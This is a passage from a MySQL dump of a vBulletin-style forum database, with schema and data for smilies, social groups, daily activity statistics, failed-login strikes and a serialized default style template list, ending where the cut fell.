(4, 'Wink', ';)', 'images/smilies/wink.gif', 1, 1),
(5, 'Stick Out Tongue', ':p', 'images/smilies/tongue.gif', 1, 1),
(6, 'Cool', ':cool:', 'images/smilies/cool.gif', 1, 5),
(7, 'Roll Eyes (Sarcastic)', ':rolleyes:', 'images/smilies/rolleyes.gif', 1, 3),
(8, 'Mad', ':mad:', 'images/smilies/mad.gif', 1, 1),
(9, 'EEK!', ':eek:', 'images/smilies/eek.gif', 1, 7),
(10, 'Confused', ':confused:', 'images/smilies/confused.gif', 1, 1),
(11, 'Frown', ':(', 'images/smilies/frown.gif', 1, 1);
DROP TABLE IF EXISTS `socialgroup`;
CREATE TABLE `socialgroup` (
`groupid` int(10) unsigned NOT NULL AUTO_INCREMENT,
`socialgroupcategoryid` int(10) unsigned NOT NULL,
`name` varchar(255) NOT NULL DEFAULT '',
`description` text,
`creatoruserid` int(10) unsigned NOT NULL DEFAULT '0',
`dateline` int(10) unsigned NOT NULL DEFAULT '0',
`members` int(10) unsigned NOT NULL DEFAULT '0',
`picturecount` int(10) unsigned NOT NULL DEFAULT '0',
`lastpost` int(10) unsigned NOT NULL DEFAULT '0',
`lastposter` varchar(255) NOT NULL DEFAULT '',
`lastposterid` int(10) unsigned NOT NULL DEFAULT '0',
`lastgmid` int(10) unsigned NOT NULL DEFAULT '0',
`visible` int(10) unsigned NOT NULL DEFAULT '0',
`deleted` int(10) unsigned NOT NULL DEFAULT '0',
`moderation` int(10) unsigned NOT NULL DEFAULT '0',
`type` enum('public','moderated','inviteonly') NOT NULL DEFAULT 'public',
`moderatedmembers` int(10) unsigned NOT NULL DEFAULT '0',
`options` int(10) unsigned NOT NULL DEFAULT '0',
`lastdiscussionid` int(10) unsigned NOT NULL DEFAULT '0',
`discussions` int(10) unsigned DEFAULT '0',
`lastdiscussion` varchar(255) NOT NULL DEFAULT '',
`lastupdate` int(10) unsigned NOT NULL DEFAULT '0',
`transferowner` int(10) unsigned NOT NULL DEFAULT '0',
PRIMARY KEY (`groupid`),
KEY `creatoruserid` (`creatoruserid`),
KEY `dateline` (`dateline`),
KEY `members` (`members`),
KEY `picturecount` (`picturecount`),
KEY `visible` (`visible`),
KEY `lastpost` (`lastpost`),
KEY `socialgroupcategoryid` (`socialgroupcategoryid`),
FULLTEXT KEY `name` (`name`,`description`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
DROP TABLE IF EXISTS `socialgroupcategory`;
CREATE TABLE `socialgroupcategory` (
`socialgroupcategoryid` int(10) unsigned NOT NULL AUTO_INCREMENT,
`creatoruserid` int(10) unsigned NOT NULL,
`title` varchar(250) NOT NULL,
`description` text NOT NULL,
`displayorder` int(10) unsigned NOT NULL,
`lastupdate` int(10) unsigned NOT NULL,
`groups` int(10) unsigned DEFAULT '0',
PRIMARY KEY (`socialgroupcategoryid`),
KEY `displayorder` (`displayorder`)
) ENGINE=InnoDB DEFAULT CHARSET=latin1;
INSERT INTO `socialgroupcategory` (`socialgroupcategoryid`, `creatoruserid`, `title`, `description`, `displayorder`, `lastupdate`, `groups`) VALUES
(1, 1, 'Uncategorized', 'Uncategorized Social Groups', 1, 1420392376, 0);
DROP TABLE IF EXISTS `socialgroupicon`;
CREATE TABLE `socialgroupicon` (
`groupid` int(10) unsigned NOT NULL DEFAULT '0',
`userid` int(10) unsigned DEFAULT '0',
`filedata` mediumblob,
`extension` varchar(20) NOT NULL DEFAULT '',
`dateline` int(10) unsigned NOT NULL DEFAULT '0',
`width` int(10) unsigned NOT NULL DEFAULT '0',
`height` int(10) unsigned NOT NULL DEFAULT '0',
`thumbnail_filedata` mediumblob,
`thumbnail_width` int(10) unsigned NOT NULL DEFAULT '0',
`thumbnail_height` int(10) unsigned NOT NULL DEFAULT '0',
PRIMARY KEY (`groupid`)
) ENGINE=InnoDB DEFAULT CHARSET=latin1;
DROP TABLE IF EXISTS `socialgroupmember`;
CREATE TABLE `socialgroupmember` (
`userid` int(10) unsigned NOT NULL DEFAULT '0',
`groupid` int(10) unsigned NOT NULL DEFAULT '0',
`dateline` int(10) unsigned NOT NULL DEFAULT '0',
`type` enum('member','moderated','invited') NOT NULL DEFAULT 'member',
PRIMARY KEY (`groupid`,`userid`),
KEY `groupid` (`groupid`,`type`),
KEY `userid` (`userid`,`type`)
) ENGINE=InnoDB DEFAULT CHARSET=latin1;
DROP TABLE IF EXISTS `socialgrouppicture`;
CREATE TABLE `socialgrouppicture` (
`groupid` int(10) unsigned NOT NULL DEFAULT '0',
`pictureid` int(10) unsigned NOT NULL DEFAULT '0',
`dateline` int(10) unsigned NOT NULL DEFAULT '0',
PRIMARY KEY (`groupid`,`pictureid`),
KEY `groupid` (`groupid`,`dateline`),
KEY `pictureid` (`pictureid`)
) ENGINE=InnoDB DEFAULT CHARSET=latin1;
DROP TABLE IF EXISTS `spamlog`;
CREATE TABLE `spamlog` (
`postid` int(10) unsigned NOT NULL DEFAULT '0',
PRIMARY KEY (`postid`)
) ENGINE=InnoDB DEFAULT CHARSET=latin1;
DROP TABLE IF EXISTS `stats`;
CREATE TABLE `stats` (
`dateline` int(10) unsigned NOT NULL DEFAULT '0',
`nuser` mediumint(8) unsigned NOT NULL DEFAULT '0',
`nthread` mediumint(8) unsigned NOT NULL DEFAULT '0',
`npost` mediumint(8) unsigned NOT NULL DEFAULT '0',
`ausers` mediumint(8) unsigned NOT NULL DEFAULT '0',
PRIMARY KEY (`dateline`)
) ENGINE=InnoDB DEFAULT CHARSET=latin1;
INSERT INTO `stats` (`dateline`, `nuser`, `nthread`, `npost`, `ausers`) VALUES
(1420261200, 1, 0, 0, 2),
(1420347600, 2, 1, 0, 5),
(1420434000, 16, 0, 0, 22),
(1420520400, 0, 0, 0, 9),
(1420606800, 14, 0, 1, 23),
(1420693200, 0, 0, 0, 9),
(1420779600, 0, 0, 0, 4),
(1420866000, 0, 1, 8, 10),
(1420952400, 0, 0, 0, 8),
(1421038800, 2, 1, 1, 10),
(1421125200, 2, 1, 5, 13),
(1421211600, 0, 1, 3, 10),
(1421298000, 0, 0, 0, 6),
(1421384400, 0, 1, 1, 8),
(1421557200, 0, 0, 0, 2),
(1421643600, 22, 0, 0, 29),
(1421730000, 0, 0, 0, 11),
(1421816400, 0, 0, 0, 9),
(1421902800, 0, 0, 0, 8),
(1421989200, 0, 0, 0, 9),
(1422075600, 0, 1, 1, 8),
(1422162000, 1, 0, 0, 10),
(1424732400, 0, 0, 0, 1),
(1424818800, 0, 0, 0, 1),
(1424905200, 0, 0, 0, 3),
(1424991600, 0, 0, 0, 3),
(1425078000, 0, 1, 1, 3),
(1425164400, 0, 1, 1, 2),
(1425250800, 0, 0, 0, 8),
(1425337200, 0, 0, 1, 8),
(1425423600, 0, 0, 0, 5),
(1425510000, 0, 0, 0, 3),
(1425596400, 0, 0, 0, 6),
(1425682800, 0, 1, 1, 6),
(1425769200, 0, 0, 0, 6),
(1425855600, 0, 0, 0, 5),
(1425942000, 0, 0, 0, 7),
(1426028400, 0, 0, 0, 5),
(1426287600, 0, 0, 0, 3),
(1426374000, 0, 0, 0, 5),
(1426460400, 0, 0, 0, 4),
(1426546800, 0, 0, 0, 5),
(1426633200, 0, 0, 0, 7),
(1426719600, 0, 0, 0, 4),
(1426806000, 0, 0, 0, 6),
(1426892400, 0, 0, 0, 5),
(1426978800, 0, 0, 0, 3),
(1427065200, 2, 0, 0, 5),
(1427151600, 0, 0, 0, 5),
(1427238000, 0, 0, 0, 6),
(1427324400, 0, 0, 0, 5),
(1427410800, 1, 0, 1, 10),
(1427497200, 0, 0, 0, 6),
(1427583600, 0, 0, 1, 6),
(1427666400, 0, 0, 2, 12),
(1427752800, 1, 1, 1, 9),
(1427839200, 0, 0, 0, 6),
(1427925600, 0, 0, 2, 11),
(1428012000, 0, 0, 5, 14),
(1428098400, 0, 0, 0, 8),
(1428184800, 0, 0, 0, 8),
(1428271200, 0, 0, 0, 8),
(1428357600, 0, 0, 0, 6),
(1428444000, 0, 0, 0, 7),
(1428530400, 0, 0, 0, 9),
(1428616800, 0, 0, 0, 6),
(1428703200, 0, 0, 0, 4),
(1428789600, 0, 0, 0, 3),
(1428876000, 0, 0, 0, 4),
(1429048800, 0, 0, 0, 3),
(1429221600, 0, 0, 0, 4),
(1429394400, 0, 0, 0, 4),
(1429480800, 0, 0, 0, 6),
(1429567200, 0, 0, 0, 4),
(1429740000, 0, 0, 0, 3),
(1429912800, 0, 0, 0, 4),
(1430085600, 0, 0, 0, 5),
(1430344800, 0, 0, 0, 3),
(1430517600, 0, 0, 0, 3),
(1430690400, 0, 0, 0, 4),
(1430863200, 0, 0, 0, 3),
(1431036000, 0, 0, 0, 3),
(1431208800, 0, 0, 0, 3),
(1431295200, 0, 0, 0, 7),
(1431381600, 0, 0, 0, 7),
(1431468000, 0, 0, 0, 6),
(1431727200, 0, 0, 0, 2),
(1431813600, 0, 0, 0, 4),
(1431900000, 0, 0, 0, 4),
(1431986400, 0, 0, 0, 4),
(1432072800, 0, 0, 0, 3),
(1432245600, 0, 0, 0, 2),
(1432418400, 0, 1, 1, 4),
(1432677600, 0, 0, 0, 1),
(1432764000, 0, 0, 0, 4),
(1432936800, 0, 0, 0, 1),
(1433109600, 0, 0, 0, 4),
(1433282400, 0, 0, 0, 3),
(1433455200, 0, 0, 0, 2),
(1433628000, 0, 0, 0, 2),
(1433714400, 0, 0, 0, 3),
(1433973600, 0, 0, 0, 2),
(1434060000, 0, 0, 0, 3),
(1434232800, 0, 0, 0, 1),
(1434319200, 0, 0, 0, 2),
(1434664800, 0, 0, 0, 1),
(1434837600, 0, 0, 0, 1),
(1435010400, 0, 0, 0, 2),
(1435096800, 0, 0, 0, 3),
(1435183200, 1, 0, 0, 3),
(1435269600, 0, 0, 0, 6),
(1435356000, 0, 0, 0, 4),
(1435442400, 0, 0, 0, 5),
(1435528800, 1, 0, 0, 7),
(1435615200, 1, 0, 0, 10),
(1435701600, 1, 1, 2, 8),
(1435788000, 0, 1, 2, 8),
(1435874400, 0, 0, 0, 6),
(1435960800, 0, 2, 3, 5),
(1436047200, 0, 0, 1, 8),
(1436133600, 0, 0, 0, 6),
(1436220000, 0, 0, 1, 5),
(1436306400, 0, 0, 1, 6),
(1436392800, 0, 0, 0, 7),
(1436479200, 0, 0, 0, 6),
(1436565600, 0, 0, 0, 5),
(1436652000, 0, 0, 0, 6),
(1436738400, 0, 0, 0, 4),
(1436824800, 0, 0, 0, 2),
(1436911200, 0, 0, 0, 3),
(1436997600, 0, 1, 1, 4),
(1437084000, 0, 0, 0, 4),
(1437170400, 0, 0, 0, 4),
(1437256800, 0, 0, 0, 5),
(1437429600, 0, 0, 0, 3),
(1437516000, 0, 1, 1, 6),
(1437602400, 0, 1, 1, 4),
(1437688800, 0, 0, 0, 3),
(1437861600, 0, 0, 0, 2),
(1437948000, 0, 0, 0, 4),
(1438034400, 0, 0, 0, 5),
(1438120800, 0, 0, 0, 9),
(1438207200, 1, 0, 0, 6),
(1438293600, 0, 0, 0, 6),
(1438380000, 0, 0, 0, 5),
(1438466400, 0, 0, 0, 6),
(1438552800, 0, 0, 0, 3),
(1438639200, 0, 0, 0, 4),
(1438725600, 0, 0, 0, 4),
(1438812000, 0, 0, 0, 3),
(1438898400, 0, 0, 0, 4),
(1438984800, 2, 0, 0, 10),
(1439071200, 0, 1, 1, 6),
(1439157600, 2, 5, 6, 8),
(1439244000, 0, 4, 12, 11),
(1439330400, 0, 1, 2, 10),
(1439416800, 0, 0, 0, 8),
(1439503200, 0, 0, 0, 6),
(1439589600, 0, 0, 0, 4),
(1439676000, 0, 0, 0, 8),
(1439762400, 1, 4, 8, 9),
(1439848800, 0, 0, 3, 9),
(1439935200, 1, 3, 4, 11),
(1440021600, 0, 2, 3, 13),
(1440108000, 0, 1, 1, 9),
(1440194400, 0, 2, 5, 7),
(1440280800, 0, 0, 3, 7),
(1440367200, 0, 362, 362, 12),
(1440453600, 0, 0, 0, 13),
(1440540000, 0, 1, 1, 10),
(1440626400, 0, 0, 2, 13),
(1440712800, 0, 0, 1, 7),
(1440799200, 0, 0, 1, 5),
(1440885600, 0, 1, 2, 7),
(1440972000, 0, 0, 0, 9),
(1441058400, 0, 1, 1, 13),
(1441144800, 2, 0, 0, 11),
(1441231200, 0, 0, 0, 10),
(1441317600, 0, 0, 0, 7),
(1441404000, 0, 0, 0, 6),
(1441490400, 0, 0, 0, 6),
(1441576800, 0, 0, 0, 6),
(1441663200, 0, 0, 0, 9),
(1441749600, 0, 0, 0, 7),
(1441836000, 0, 0, 0, 7),
(1441922400, 0, 0, 1, 8),
(1442008800, 0, 1, 2, 9),
(1442095200, 0, 1, 2, 13),
(1442181600, 0, 0, 1, 9),
(1442268000, 0, 0, 0, 9),
(1442354400, 2, 0, 0, 12),
(1442440800, 0, 1, 1, 11),
(1442527200, 1, 23, 23, 10),
(1442613600, 1, 16, 16, 6),
(1442700000, 1, 18, 20, 12),
(1442786400, 3, 15, 18, 13),
(1442872800, 1, 24, 27, 19),
(1442959200, 0, 7, 8, 13),
(1443045600, 2, 9, 15, 14),
(1443132000, 0, 4, 4, 12),
(1443218400, 0, 1, 2, 12),
(1443304800, 0, 9, 18, 12),
(1443391200, 0, 0, 0, 11),
(1443477600, 0, 0, 1, 11),
(1443564000, 0, 1, 1, 11),
(1443650400, 0, 0, 2, 12),
(1443736800, 0, 1, 1, 10),
(1443823200, 1, 0, 0, 10),
(1443909600, 0, 0, 0, 9),
(1443996000, 0, 0, 0, 9),
(1444082400, 0, 0, 6, 9),
(1444168800, 0, 0, 1, 9),
(1444255200, 0, 2, 2, 10),
(1444341600, 0, 0, 1, 8),
(1444428000, 1, 0, 0, 8),
(1444514400, 0, 0, 0, 9),
(1444600800, 0, 1, 1, 11),
(1444687200, 0, 0, 0, 11),
(1444773600, 0, 0, 0, 8),
(1444860000, 0, 2, 2, 8),
(1444946400, 0, 0, 0, 7),
(1445032800, 0, 1, 6, 10),
(1445119200, 0, 0, 0, 8),
(1445205600, 0, 0, 0, 12),
(1445292000, 0, 0, 0, 11),
(1445378400, 0, 1, 3, 11),
(1445464800, 0, 0, 0, 8),
(1445551200, 0, 0, 4, 9),
(1445637600, 0, 0, 0, 7),
(1445724000, 0, 1, 4, 8),
(1445814000, 0, 0, 1, 15),
(1445900400, 1, 0, 0, 10),
(1445986800, 0, 1, 1, 10),
(1446073200, 0, 0, 0, 11),
(1446159600, 38, 0, 1, 47),
(1446246000, 31, 0, 0, 42),
(1446332400, 7, 0, 1, 22),
(1446418800, 5, 1, 2, 20),
(1446505200, 4, 0, 2, 20),
(1446591600, 3, 0, 2, 17),
(1446678000, 5, 3, 5, 13),
(1447045200, 0, 0, 0, 1),
(1447131600, 4, 6, 7, 13),
(1447218000, 2, 0, 0, 16),
(1447304400, 2, 2, 4, 13),
(1447390800, 3, 1, 1, 15),
(1447477200, 2, 2, 2, 9),
(1447563600, 0, 0, 0, 9),
(1447650000, 3, 1, 1, 16),
(1447736400, 4, 1, 1, 28),
(1447822800, 2, 0, 0, 16),
(1447909200, 2, 0, 0, 15),
(1447995600, 2, 0, 2, 11),
(1448082000, 1, 1, 1, 18),
(1448168400, 1, 1, 1, 9),
(1448254800, 0, 1, 1, 7),
(1448341200, 2, 0, 0, 11),
(1448427600, 1, 0, 0, 10),
(1448514000, 1, 0, 0, 13),
(1448600400, 2, 0, 0, 9),
(1448686800, 2, 0, 0, 6),
(1448773200, 0, 0, 1, 8),
(1448859600, 1, 0, 0, 12),
(1448946000, 2, 1, 1, 11),
(1449032400, 3, 2, 5, 18),
(1449118800, 0, 0, 0, 12),
(1449205200, 0, 1, 1, 10),
(1449291600, 2, 0, 0, 10),
(1449378000, 2, 0, 1, 10),
(1449464400, 0, 1, 1, 11),
(1449550800, 2, 2, 2, 14),
(1449637200, 3, 1, 2, 15),
(1449723600, 1, 0, 1, 13),
(1449810000, 3, 1, 3, 12),
(1449896400, 0, 0, 0, 10),
(1449982800, 0, 1, 1, 12),
(1450069200, 0, 0, 0, 8),
(1450155600, 0, 0, 1, 11),
(1450242000, 1, 0, 0, 12),
(1450328400, 1, 0, 0, 9),
(1450414800, 0, 0, 0, 7),
(1450501200, 1, 2, 2, 7),
(1450587600, 1, 0, 0, 5),
(1450674000, 1, 0, 0, 12),
(1450760400, 2, 2, 3, 11),
(1450846800, 2, 3, 4, 13),
(1450933200, 4, 5, 6, 18),
(1451019600, 3, 0, 0, 12),
(1451106000, 3, 0, 0, 9),
(1451192400, 3, 0, 1, 12),
(1451278800, 1, 0, 1, 12),
(1451365200, 3, 0, 0, 15),
(1451451600, 1, 1, 4, 13),
(1451538000, 1, 0, 0, 12),
(1451624400, 2, 0, 0, 8),
(1451710800, 1, 0, 0, 12),
(1451797200, 1, 0, 0, 9),
(1451883600, 1, 0, 0, 9),
(1451970000, 0, 0, 0, 7),
(1452056400, 3, 0, 0, 10),
(1452142800, 1, 0, 1, 13),
(1452229200, 2, 0, 0, 6),
(1452315600, 1, 1, 1, 12),
(1452402000, 1, 0, 1, 10),
(1452488400, 2, 0, 0, 11),
(1452574800, 1, 0, 0, 8),
(1452661200, 1, 0, 0, 9),
(1452747600, 2, 0, 2, 12),
(1452834000, 0, 0, 0, 8),
(1452920400, 0, 0, 0, 4),
(1453006800, 0, 0, 0, 6),
(1453093200, 0, 0, 0, 8),
(1453179600, 0, 0, 0, 11),
(1453266000, 0, 0, 0, 9),
(1453352400, 0, 0, 1, 4),
(1453438800, 0, 1, 3, 9),
(1453525200, 0, 0, 2, 6),
(1453611600, 0, 0, 1, 8),
(1453698000, 0, 0, 0, 10),
(1453784400, 0, 0, 0, 9),
(1453870800, 1, 0, 0, 7),
(1453957200, 0, 0, 0, 4),
(1454043600, 0, 0, 0, 4),
(1454130000, 0, 0, 0, 4),
(1454216400, 0, 0, 0, 6),
(1454302800, 0, 0, 0, 9),
(1454389200, 0, 0, 0, 7),
(1454475600, 0, 2, 2, 13),
(1454562000, 0, 2, 3, 13),
(1454648400, 0, 1, 2, 15),
(1454734800, 0, 0, 1, 10),
(1454821200, 0, 0, 0, 7),
(1454907600, 0, 0, 0, 6),
(1454994000, 0, 0, 0, 8),
(1455080400, 0, 0, 0, 7),
(1455166800, 0, 0, 1, 6),
(1455253200, 0, 1, 1, 6),
(1455339600, 0, 0, 0, 8),
(1455426000, 0, 1, 3, 8),
(1455512400, 0, 0, 0, 10),
(1455598800, 0, 0, 0, 8),
(1455685200, 0, 0, 1, 11),
(1455771600, 0, 0, 1, 10),
(1455858000, 0, 0, 1, 9),
(1455944400, 0, 0, 0, 8),
(1456030800, 0, 1, 2, 15),
(1456117200, 1, 1, 3, 17),
(1456203600, 0, 3, 4, 14),
(1456290000, 0, 0, 1, 11),
(1456376400, 0, 1, 1, 14),
(1456462800, 0, 1, 3, 15),
(1456549200, 0, 0, 0, 11),
(1456635600, 0, 0, 0, 9),
(1456722000, 1, 0, 3, 16),
(1456808400, 0, 0, 0, 13),
(1456894800, 0, 0, 1, 12),
(1456981200, 0, 0, 0, 11),
(1457067600, 0, 0, 0, 14),
(1457154000, 0, 0, 1, 11),
(1457240400, 0, 0, 1, 6),
(1457326800, 0, 0, 0, 11),
(1457413200, 0, 0, 0, 12),
(1457499600, 0, 0, 0, 9),
(1457586000, 0, 0, 0, 13),
(1457672400, 0, 0, 0, 8),
(1457758800, 0, 0, 0, 6),
(1457845200, 0, 1, 2, 9),
(1457928000, 0, 1, 2, 9),
(1458014400, 0, 0, 0, 13),
(1458100800, 0, 0, 0, 11),
(1458187200, 0, 0, 0, 12),
(1458273600, 0, 0, 0, 9),
(1458360000, 0, 0, 0, 6),
(1458446400, 0, 0, 0, 8),
(1458532800, 0, 1, 1, 7),
(1458619200, 0, 1, 7, 16),
(1458705600, 0, 0, 0, 12),
(1458792000, 0, 0, 0, 9),
(1458878400, 0, 0, 0, 7),
(1458964800, 0, 0, 0, 7),
(1459051200, 0, 1, 1, 5),
(1459137600, 0, 0, 0, 7),
(1459224000, 0, 0, 0, 8),
(1459310400, 0, 0, 0, 6),
(1459396800, 0, 0, 0, 7),
(1459483200, 0, 0, 0, 3),
(1459569600, 0, 0, 0, 5),
(1459656000, 0, 0, 0, 3),
(1459742400, 1, 0, 1, 10),
(1459828800, 0, 0, 0, 6),
(1459915200, 0, 0, 0, 9),
(1460001600, 0, 1, 1, 7),
(1460088000, 0, 0, 0, 5),
(1460174400, 0, 0, 0, 7),
(1460260800, 0, 1, 2, 8),
(1460347200, 0, 0, 0, 10),
(1460433600, 0, 0, 0, 8),
(1460520000, 0, 0, 0, 10),
(1460606400, 0, 0, 0, 8),
(1460692800, 0, 0, 2, 7),
(1460779200, 0, 0, 0, 4),
(1460865600, 0, 0, 0, 7),
(1460952000, 0, 0, 0, 6),
(1461038400, 0, 0, 0, 8),
(1461124800, 0, 0, 0, 7),
(1461211200, 0, 0, 0, 2),
(1461297600, 0, 0, 0, 5),
(1461384000, 0, 0, 0, 4),
(1461470400, 0, 0, 0, 1),
(1461556800, 0, 0, 0, 4),
(1461643200, 0, 0, 0, 7),
(1461729600, 0, 0, 0, 4),
(1461816000, 0, 0, 0, 3),
(1461902400, 0, 0, 0, 6),
(1461988800, 0, 0, 0, 3),
(1462075200, 0, 0, 0, 2),
(1462161600, 0, 0, 0, 6),
(1462248000, 0, 0, 0, 8),
(1462334400, 0, 0, 0, 7),
(1462420800, 0, 1, 1, 8),
(1462507200, 0, 0, 0, 1),
(1462593600, 0, 0, 0, 6),
(1462680000, 0, 0, 0, 6),
(1462766400, 0, 1, 1, 10),
(1462852800, 0, 1, 1, 11),
(1462939200, 0, 1, 1, 6),
(1463025600, 0, 0, 0, 5),
(1463112000, 0, 0, 0, 4),
(1463198400, 0, 0, 0, 2),
(1463284800, 0, 0, 0, 3),
(1463371200, 0, 0, 0, 7),
(1463457600, 0, 0, 0, 8),
(1463544000, 0, 0, 0, 4),
(1463630400, 1, 0, 0, 5),
(1463716800, 1, 2, 2, 7),
(1463803200, 0, 0, 0, 4),
(1463889600, 0, 0, 0, 13),
(1463976000, 0, 0, 0, 14),
(1464062400, 0, 0, 0, 6),
(1464148800, 0, 1, 1, 9),
(1464235200, 0, 0, 0, 3),
(1464321600, 0, 0, 0, 4),
(1464408000, 0, 2, 3, 6),
(1464494400, 0, 0, 0, 6),
(1464580800, 0, 0, 0, 9),
(1464667200, 0, 0, 0, 10),
(1464753600, 0, 0, 0, 4),
(1464840000, 0, 0, 0, 9),
(1464926400, 0, 0, 0, 8),
(1465012800, 0, 0, 0, 8),
(1465099200, 0, 0, 0, 8);
DROP TABLE IF EXISTS `strikes`;
CREATE TABLE `strikes` (
`striketime` int(10) unsigned NOT NULL DEFAULT '0',
`strikeip` char(15) NOT NULL DEFAULT '',
`username` varchar(100) NOT NULL DEFAULT '',
KEY `striketime` (`striketime`),
KEY `strikeip` (`strikeip`)
) ENGINE=InnoDB DEFAULT CHARSET=latin1;
INSERT INTO `strikes` (`striketime`, `strikeip`, `username`) VALUES
(1475315114, '178.216.49.220', ''),
(1475315114, '178.216.49.220', ''),
(1475315114, '178.216.49.220', '');
DROP TABLE IF EXISTS `style`;
CREATE TABLE `style` (
`styleid` smallint(5) unsigned NOT NULL AUTO_INCREMENT,
`title` varchar(250) NOT NULL DEFAULT '',
`parentid` smallint(6) NOT NULL DEFAULT '0',
`parentlist` varchar(250) NOT NULL DEFAULT '',
`templatelist` mediumtext,
`csscolors` mediumtext,
`css` mediumtext,
`stylevars` mediumtext,
`replacements` mediumtext,
`editorstyles` mediumtext,
`userselect` smallint(5) unsigned NOT NULL DEFAULT '1',
`displayorder` smallint(5) unsigned NOT NULL DEFAULT '0',
PRIMARY KEY (`styleid`)
) ENGINE=InnoDB DEFAULT CHARSET=latin1;
INSERT INTO `style` (`styleid`, `title`, `parentid`, `parentlist`, `templatelist`, `csscolors`, `css`, `stylevars`, `replacements`, `editorstyles`, `userselect`, `displayorder`) VALUES
(1, 'Default Style', -1, '1,-1', 'a:585:{s:18:\".alt1, .alt1Active\";s:4:\"1161\";s:18:\".alt2, .alt2Active\";s:4:\"1162\";s:5:\".alt3\";s:4:\"1163\";s:7:\".button\";s:4:\"1164\";s:8:\".fjdpth0\";s:4:\"1165\";s:8:\".fjdpth1\";s:4:\"1166\";s:8:\".fjdpth2\";s:4:\"1167\";s:8:\".fjdpth3\";s:4:\"1168\";s:8:\".fjdpth4\";s:4:\"1169\";s:6:\".fjsel\";s:4:\"1170\";s:10:\".highlight\";s:4:\"1171\";s:10:\".inlinemod\";s:4:\"1172\";s:7:\".navbar\";s:4:\"1173\";s:5:\".page\";s:4:\"1174\";s:6:\".panel\";s:4:\"1175\";s:14:\".panelsurround\";s:4:\"1176\";s:10:\".smallfont\";s:4:\"1177\";s:8:\".tborder\";s:4:\"1178\";s:5:\".tcat\";s:4:\"1179\";s:6:\".tfoot\";s:4:\"1180\";s:6:\".thead\";s:4:\"1181\";s:5:\".time\";s:4:\"1182\";s:15:\".vbmenu_control\";s:4:\"1183\";s:14:\".vbmenu_hilite\";s:4:\"1184\";s:14:\".vbmenu_option\";s:4:\"1185\";s:13:\".vbmenu_popup\";s:4:\"1186\";s:8:\".wysiwyg\";s:4:\"1187\";s:12:\"activateform\";s:4:\"1708\";s:21:\"activate_requestemail\";s:4:\"1709\";s:13:\"ad_footer_end\";s:4:\"1222\";s:15:\"ad_footer_start\";s:4:\"1223\";s:28:\"ad_forumdisplay_afterthreads\";s:4:\"1224\";s:24:\"ad_forumhome_afterforums\";s:4:\"1225\";s:13:\"ad_header_end\";s:4:\"1226\";s:14:\"ad_header_logo\";s:4:\"1227\";s:15:\"ad_navbar_below\";s:4:\"1228\";s:22:\"ad_showthread_beforeqr\";s:4:\"1229\";s:23:\"ad_showthread_firstpost\";s:4:\"1230\";s:27:\"ad_showthread_firstpost_sig\";s:4:\"1231\";s:29:\"ad_showthread_firstpost_start\";s:4:\"1232\";s:8:\"albumbit\";s:4:\"1233\";s:14:\"album_addgroup\";s:4:\"1234\";s:23:\"album_addgroup_groupbit\";s:4:\"1235\";s:10:\"album_edit\";s:4:\"1236\";s:15:\"album_latestbit\";s:4:\"1237\";s:10:\"album_list\";s:4:\"1238\";s:23:\"album_moderatedcomments\";s:4:\"1239\";s:16:\"album_picturebit\";s:4:\"1240\";s:25:\"album_picturebit_checkbox\";s:4:\"1241\";s:23:\"album_picturebit_unread\";s:4:\"1242\";s:17:\"album_picturelist\";s:4:\"1243\";s:17:\"album_pictureview\";s:4:\"1244\";s:18:\"album_picture_edit\";s:4:\"1245\";s:21:\"album_picture_editbit\";s:4:\"1246\";s:20:\"album_picture_upload\";s:4:\"1247\";s:23:\"album_picture_uploadbit\";s:4:\"1248\";s:20:\"album_unreadcomments\";s:4:\"1249\";s:12:\"announcement\";s:4:\"1250\";s:17:\"announcement_edit\";s:4:\"1251\";s:13:\"attachmentbit\";s:4:\"1710\";s:11:\"ATTACHMENTS\";s:4:\"1711\";s:11:\"bbcode_code\";s:4:\"1252\";s:19:\"bbcode_code_styleid\";i:-1;s:21:\"bbcode_code_printable\";s:4:\"1253\";s:11:\"bbcode_html\";s:4:\"1254\";s:19:\"bbcode_html_styleid\";i:-1;s:21:\"bbcode_html_printable\";s:4:\"1255\";s:10:\"bbcode_php\";s:4:\"1256\";s:18:\"bbcode_php_styleid\";i:-1;s:20:\"bbcode_php_printable\";s:4:\"1257\";s:12:\"bbcode_quote\";s:4:\"1258\";s:20:\"bbcode_quote_styleid\";i:-1;s:22:\"bbcode_quote_printable\";s:4:\"1259\";s:22:\"board_inactive_warning\";s:4:\"1712\";s:4:\"body\";s:4:\"1188\";s:9:\"BUDDYLIST\";s:4:\"1260\";s:12:\"buddylistbit\";s:4:\"1261\";s:8:\"CALENDAR\";s:4:\"1262\";s:12:\"calendarjump\";s:4:\"1263\";s:15:\"calendarjumpbit\";s:4:\"1264\";s:13:\"calendar_edit\";s:4:\"1265\";s:25:\"calendar_edit_customfield\";s:4:\"1266\";s:24:\"calendar_edit_recurrence\";s:4:\"1267\";s:15:\"calendar_manage\";s:4:\"1268\";s:16:\"calendar_monthly\";s:4:\"1269\";s:25:\"calendar_monthly_birthday\";s:4:\"1270\";s:20:\"calendar_monthly_day\";s:4:\"1271\";s:26:\"calendar_monthly_day_other\";s:4:\"1272\";s:22:\"calendar_monthly_event\";s:4:\"1273\";s:23:\"calendar_monthly_header\";s:4:\"1274\";s:21:\"calendar_monthly_week\";s:4:\"1275\";s:17:\"CALENDAR_REMINDER\";s:4:\"1276\";s:28:\"calendar_reminder_choosetype\";s:4:\"1277\";s:26:\"calendar_reminder_eventbit\";s:4:\"1278\";s:22:\"calendar_showbirthdays\";s:4:\"1279\";s:19:\"calendar_showevents\";s:4:\"1280\";s:22:\"calendar_showeventsbit\";s:4:\"1281\";s:34:\"calendar_showeventsbit_customfield\";s:4:\"1282\";s:23:\"calendar_smallmonth_day\";s:4:\"1283\";s:29:\"calendar_smallmonth_day_other\";s:4:\"1284\";s:26:\"calendar_smallmonth_header\";s:4:\"1285\";s:24:\"calendar_smallmonth_week\";s:4:\"1286\";s:15:\"calendar_weekly\";s:4:\"1287\";s:19:\"calendar_weekly_day\";s:4:\"1288\";s:21:\"calendar_weekly_event\";s:4:\"1289\";s:15:\"calendar_yearly\";s:4:\"1290\";s:11:\"cellpadding\";s:4:\"1195\";s:11:\"cellspacing\";s:4:\"1196\";s:14:\"codeblockwidth\";s:4:\"1197\";s:9:\"contactus\";s:4:\"1713\";s:16:\"contactus_option\";s:4:\"1714\";s:8:\"converse\";s:4:\"1715\";s:19:\"editor_clientscript\";s:4:\"1291\";s:10:\"editor_css\";s:4:\"1292\";s:21:\"editor_jsoptions_font\";s:4:\"1293\";s:21:\"editor_jsoptions